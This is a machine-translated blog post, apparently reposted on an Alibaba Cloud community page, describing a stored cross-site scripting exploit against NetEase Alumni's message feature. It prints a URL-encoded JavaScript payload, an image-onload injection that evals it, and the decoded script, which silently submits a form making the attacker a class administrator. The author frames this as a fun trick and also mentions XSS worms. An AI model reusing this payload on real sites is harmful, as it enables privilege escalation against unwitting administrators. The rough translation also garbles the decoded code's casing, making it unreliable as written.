NETEASE Alumni message functions exist across the station, here demonstrates a use it to add themselves as a class administrator method.
Fill in the message box:
+++try%20%7b%0d%0a%09var%20as%20%3d%20document.getelementsbytagname%28%22a%22%29%3b%0d%0a%09var%20frm%20%3d% 20document.getelementsbytagname%28%22iframe%22%29%5b0%5d%3b%0d%0a%09frm.onload%20%3d%20function%28%29%20%7b%0d %0a%09%09var%20ofrm%20%3d%20document.getelementsbytagname%28%22iframe%22%29%5b0%5d%3b%0d%0a%09%09ofrm.onload% 20%3d%20%22%22%3b%0d%0a%09%09var%20odoc%20%3d%20ofrm.contentwindow.document%3b%0d%0a%09%09odoc.all%5b%22who%22 %5d%5b1%5d.checked%20%3d%20true%3b%0d%0a%09%09odoc.dealmember.action%20%3d%20%22backaction/updateclassmate.jsp %3ff%3d1%22%3b%0d%0a%09%09odoc.dealmember.submit%28%29%3b%0d%0a%09%7d%0d%0a%09frm.src%20%3d%20as%5b34%5d.href% 3b%0d%0a%7d%20catch%20%28e%29%20%7b%0d%0a%09alert%28e%29%3b%0d%0a%7d---
In the message map URL of the input box to fill in:
Yun_qi_img/classhome_logo.gif "Onload=" var t=document.body.innerhtml;var s=t.indexof (' +++ ') +3;var e=t.indexOf ('--- '); eval (unescape (t.substring (s,e)); >
The administrator will add me as an administrator when checking the class message.
2. Principle:
message box filled in the message between the +++ and---Part of the code after decoding the following:
try {
var as = document.getElementsByTagName ("a");
var frm = document.getElementsByTagName ("iframe") [0];
Frm.onload = function () {
var ofrm = document.getElementsByTagName ("iframe") [0];
Ofrm.onload = "";
var odoc = oFrm.contentWindow.document;
Odoc.all["who"][1].checked = true;
ODoc.dealmember.action = "Backaction/updateclassmate.jsp?f=1";
ODoc.dealmember.submit ();
}
FRM.SRC = As[34].href;
catch (e) {
Alert (e);
}
The vulnerability out of the map URL in the input box does not filter the URL, I put a map here, plus a onload event, as long as the picture
URL is valid, the picture normal loading will trigger the event, execute my onload code, and the onload code search
The code in my message, decode it, and execute it. Because the length of the picture URL is limited, so I do this once
Jump, the things I want to do is divided into two steps.
3. Finally:
Why to paste this little technical content of things, mainly feel more funy, you do not feel such a use of the process and overflow
Jump execution shellcode have the same meaning, because there are length limitations, so we have to divide shellcode into several parts,
The first part jumps to the second section to break the length limit, and the principle of all vulnerabilities is similar.
Cross-station utilization can also play a lot of fun, such as "existing HTML and JS context of the use of self-hidden, script deformation,
Break the length limit, Cross station bug worms and so on ", throw a brick here waiting for everyone's jade.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
A Free Trial That Lets You Build Big!
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
